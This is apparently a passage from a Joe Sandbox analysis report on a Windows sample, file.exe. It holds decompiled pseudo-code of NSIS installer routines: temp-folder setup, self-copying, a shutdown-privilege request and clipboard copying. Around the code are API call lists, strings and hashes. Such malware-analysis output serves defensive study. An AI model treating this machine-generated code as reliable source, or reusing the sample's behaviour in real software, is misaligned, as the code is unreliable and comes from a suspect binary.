														SetCurrentDirectoryW(_t235);
														__eflags =  *0x435800;
														if( *0x435800 == 0) {
															E00406507(0x435800, 0x436800);
														}
														E00406507(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
															DeleteFileW(0x420ec8);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\file.exe", 0x420ec8, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062C7(_t202, 0x420ec8, 0);
																	E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
																	_t153 = E00405AEA(0x420ec8);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062C7(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EDE(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406507(0x435800, _t222);
												E00406507(0x436000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x435000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034C6(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034C6(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a2c0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x00403505
0x00403506
0x0040350d
0x00403510
0x00403517
0x0040351a
0x0040352d
0x00403533
0x00403536
0x00403539
0x00403547
0x0040354f
0x0040355a
0x00403573
0x00403575
0x0040357d
0x0040357d
0x00403588
0x0040358a
0x0040358a
0x0040359f
0x004035c4
0x004035d2
0x004035d5
0x004035dc
0x004035e3
0x004035e3
0x004035dc
0x004035e5
0x004035ea
0x004035eb
0x004035f7
0x004035fb
0x00403602
0x00403610
0x00403615
0x0040361c
0x00403620
0x00403624
0x00403626
0x00403626
0x00403624
0x0040362d
0x00403634
0x0040363a
0x00403652
0x00403662
0x00403674
0x0040367b
0x0040367d
0x0040367e
0x0040368f
0x00403693
0x00403693
0x004036a6
0x004036a8
0x004037a2
0x004037a2
0x004037a5
0x004037a8
0x00000000
0x00000000
0x004036b2
0x004036b3
0x004036b6
0x004036bf
0x004036bf
0x004036c2
0x004036c5
0x004036c8
0x004036cb
0x004036cb
0x004036cb
0x004036cc
0x004036d0
0x00403790
0x00403799
0x0040379b
0x0040379e
0x004037a1
0x004037a1
0x004037a1
0x00000000
0x004036d6
0x004036d7
0x004036d8
0x004036dc
0x004036f6
0x004036fd
0x00403710
0x00403711
0x00403726
0x0040372b
0x0040372d
0x0040372f
0x0040374b
0x00403752
0x00403765
0x00403766
0x0040377b
0x00403781
0x00403783
0x00403785
0x0040378d
0x0040378f
0x00000000
0x0040378f
0x00403789
0x0040378b
0x004037b0
0x004037b4
0x004037bd
0x004037c2
0x004037c8
0x004037d3
0x004037d5
0x004037da
0x004037dc
0x00403834
0x00403839
0x00403842
0x00403849
0x0040384c
0x00403a23
0x00403a23
0x00403a28
0x00403a31
0x00403a4e
0x00403ac6
0x00403ac6
0x00403ace
0x00403ad0
0x00403ad0
0x00403ad6
0x00403ad6
0x00403a65
0x00403a71
0x00403a82
0x00403a89
0x00403a90
0x00403a90
0x00403a98
0x00403aa4
0x00403ab2
0x00403abd
0x00000000
0x00000000
0x00000000
0x00403aa6
0x00403aa6
0x00403aa7
0x00403aa9
0x00403aaa
0x00403aab
0x00403ab0
0x00403abf
0x00403ac1
0x00000000
0x00403ac1
0x00000000
0x00403ab0
0x00403aa4
0x00403a3b
0x00403a42
0x00403a42
0x00403858
0x004038ff
0x004038ff
0x0040390b
0x00000000
0x0040390b
0x00403869
0x00403871
0x004038c3
0x004038c3
0x004038c9
0x004038d0
0x0040391e
0x00403920
0x00403925
0x00403927
0x0040392f
0x0040392f
0x0040393a
0x00403946
0x0040394c
0x0040394e
0x00403a21
0x00403a21
0x00403a21
0x00000000
0x00403954
0x00403954
0x00403956
0x00403957
0x00403960
0x00403959
0x00403959
0x00403959
0x00403966
0x0040396e
0x00403975
0x0040397d
0x0040397d
0x0040398a
0x00403996
0x004039a0
0x004039a0
0x004039a2
0x004039a9
0x004039b3
0x004039bf
0x004039c5
0x004039cb
0x004039ce
0x004039d8
0x004039de
0x004039e0
0x004039e4
0x004039f5
0x004039fb
0x00403a00
0x00403a02
0x00403a05
0x00403a0b
0x00403a0b
0x00403a02
0x004039e0
0x00403a0e
0x00403a15
0x00403a15
0x00403a15
0x00403a15
0x00403a1c
0x00000000
0x00403a1c
0x0040394e
0x004038d2
0x004038d5
0x004038d9
0x004038de
0x004038e0
0x00000000
0x00000000
0x004038ec
0x004038f7
0x004038fc
0x00000000
0x004038fc
0x0040387a
0x00403892
0x004038a3
0x004038a4
0x004038a8
0x004038aa
0x004038b8
0x004038bf
0x00000000
0x00000000
0x00000000
0x004038bf
0x004038c1
0x00000000
0x004038c1
0x004037e4
0x004037f0
0x004037f5
0x004037fa
0x004037fc
0x00000000
0x00000000
0x00403804
0x0040380c
0x0040381d
0x00403825
0x00403827
0x0040382c
0x0040382e
0x00000000
0x00000000
0x00000000
0x0040382e
0x00000000
0x0040378b
0x00403734
0x00403736
0x00000000
0x00000000
0x00403738
0x0040373c
0x00403740
0x00403747
0x00403747
0x00403747
0x00403747
0x00000000
0x00403747
0x00403742
0x00403745
0x00000000
0x00000000
0x00000000
0x00403745
0x004036de
0x004036e2
0x004036e5
0x004036ec
0x004036ec
0x00000000
0x004036ec
0x004036e7
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036b8
0x004036b8
0x004036b9
0x004036ba
0x004036ba
0x00000000
0x004036b8
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(C:\Users\user\Desktop\file.exe,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

C:\Users\user\Desktop\file.exe, xrefs: 004039D3
.tmp, xrefs: 00403934
NSIS Error, xrefs: 00403658
TEMP, xrefs: 00403818
~nsu, xrefs: 00403918
SeShutdownPrivilege, xrefs: 00403A6B
\Temp, xrefs: 004037EA
1033, xrefs: 00403834
TMP, xrefs: 00403820
C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
Error launching installer, xrefs: 004038C9
Low, xrefs: 00403806
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-1769968843
Opcode ID: 67f0230e33585efcca327cd80b3c1b24a3f111523695cb400044338af504c5bf
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: 67f0230e33585efcca327cd80b3c1b24a3f111523695cb400044338af504c5bf
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8); // executed
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226e0; // 0x5bc3cc
								E00405569( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056b0
0x004056b6
0x004056c0
0x004056c3
0x00405859
0x00405876
0x0040587d
0x0040587d
0x00405890
0x004058ae
0x004058b0
0x004058b8
0x0040590e
0x00405912
0x00000000
0x00000000
0x00405914
0x0040591a
0x00000000
0x00000000
0x00405924
0x0040592c
0x0040592f
0x00405a31
0x00000000
0x00405a31
0x0040593e
0x00405949
0x00405952
0x0040595d
0x00405960
0x00405969
0x0040596f
0x00405972
0x00405972
0x0040598a
0x00405993
0x00405996
0x0040599d
0x004059a4
0x004059ac
0x004059ac
0x004059c3
0x004059c3
0x004059ca
0x004059d0
0x004059dc
0x004059e3
0x004059ec
0x004059ee
0x004059f1
0x00405a00
0x00405a03
0x00405a09
0x00405a0a
0x00405a10
0x00405a11
0x00405a12
0x00405a1a
0x00405a25
0x00405a2b
0x00405a2b
0x00000000
0x0040598a
0x004058c0
0x004058f0
0x004058f8
0x004058fa
0x00405903
0x00405903
0x00405909
0x00000000
0x00405909
0x004058c4
0x004058ce
0x00000000
0x00405892
0x00405898
0x004058d3
0x00000000
0x004058dc
0x004058a1
0x004058a6
0x004058a9
0x00000000
0x004058a9
0x00405890
0x004056c9
0x004056cd
0x004056d5
0x004056d9
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e6
0x004056e7
0x00405700
0x00405703
0x0040570d
0x0040571c
0x00405724
0x0040572c
0x00405731
0x00405734
0x00405740
0x00405749
0x00405752
0x00405774
0x0040577a
0x0040578b
0x00405790
0x0040579e
0x004057ac
0x004057ac
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057c7
0x004057cc
0x004057d8
0x004057e1
0x004057ee
0x004057fd
0x004057f0
0x004057f5
0x004057f5
0x00405809
0x00405809
0x0040581d
0x00405826
0x0040582f
0x0040583f
0x0040584b
0x0040584b
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405706
GetDlgItem.USER32(?,000003EE), ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32(00000002), ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32(?,000003EC), ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32(?,000003F8), ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32(?,000003EC), ref: 00405868
CreateThread.KERNEL32(00000000,00000000,Function_0000563C,00000000), ref: 00405876
CloseHandle.KERNELBASE(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
GetWindowRect.USER32(?,?), ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32(00000000), ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 70AC1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E70AC1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E70AC12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E70AC12BB();
				_t321 = E70AC12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E70AC13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E70AC162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
